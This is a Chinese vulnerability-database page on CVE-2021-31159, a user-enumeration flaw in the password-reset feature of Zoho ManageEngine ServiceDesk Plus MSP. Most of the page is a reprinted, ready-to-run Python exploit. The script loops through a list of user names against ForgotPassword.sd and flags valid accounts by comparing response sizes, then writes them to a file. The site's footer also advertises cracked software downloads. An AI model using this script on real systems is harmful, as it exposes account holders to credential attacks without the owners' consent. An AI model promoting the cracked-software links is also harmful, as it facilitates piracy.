文章目录[隐藏]

Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

漏洞ID	2487231	漏洞类型	其他
发布时间	2021-07-02	更新时间	2021-07-02
CVE编号	CVE-2021-31159	CNNVD-ID	CNNVD-202106-1311
漏洞平台	N/A	CVSS评分	N/A

|漏洞来源

https://cxsecurity.com/issue/WLB-2021070007

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202106-1311

|漏洞详情

ZOHO ManageEngine ServiceDesk Plus（SDP）是美国卓豪（ZOHO）公司的一套基于ITIL架构的IT服务管理软件。该软件集成了事件管理、问题管理、资产管理IT项目管理、采购与合同管理等功能模块。 Zoho ManageEngine ServiceDesk Plus MSP存在安全漏洞，该漏洞源于Zoho ManageEngine ServiceDesk Plus MSP容易受到用户枚举错误的攻击，这是由于在忘记密码功能中产生不正确的错误消息。

|漏洞EXP

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration 
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
	parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
	parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')	
	parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	url = args.target
	domain = args.domain
	usersfile = args.usersfile
	outputfile = args.outputfile

	s = requests.session()
	s.get(url)
	resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
	incorrect_size = len(resp_incorrect.content)
	print("Incorrect size: %s"%(incorrect_size))

	correct_users = []
	users = open(usersfile).read().splitlines()
	for u in users:
			resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) 
			valid = (len(resp.content) != incorrect_size)
			if valid:
				correct_users.append(u)
			print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))

	print("\nCorrect users\n")
	with open(outputfile, 'w') as f:
		for user in correct_users:
			f.write("%s\n" % user)
			print("- %s"%(user))

	print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()

|参考资料

来源:CONFIRM

链接:https://www.manageengine.com/products/service-desk-msp/readme.html#10519

本文由华域联盟原创撰写：华域联盟 » Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

转载请保留出处和原文链接：https://www.cnhackhy.com/97295.htm

Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

相关文章

作者: sterben

发表回复取消回复

wordpress内链优化插件WP Keyword Link

.Net的GC垃圾回收原理及实现

.Net Core导入千万级数据至Mysql数据库的实现方法

IIS部署ASP.NET5的实现步骤

vMix Pro破解版(视频混合器软件)下载 V23.0.0.67 中文版(附破解教程)

vMix Pro破解版(视频混合器软件)下载 V23.0.0.67 中文版(附破解教程)

冰点还原精灵永久免费版 v8.55.020.5505 永久激活版

重磅！博彦科技正式发布鸿蒙HarmonyOS移动金融技术平台

HarmonyOS 4.2正式版华丽登场！22款设备今日即享

鸿蒙生态使能- HarmonyOS官网

联系我们

微信扫一扫关注我们

Zoho ManageEngine ServiceDesk Plus MSP 安全漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

相关文章

作者: sterben

Claroty Secure Remote Access Site 安全漏洞

Tenable Network Security Nessus 代码问题漏洞

相关推荐

发表回复 取消回复

联系我们

微信扫一扫关注我们

发表回复取消回复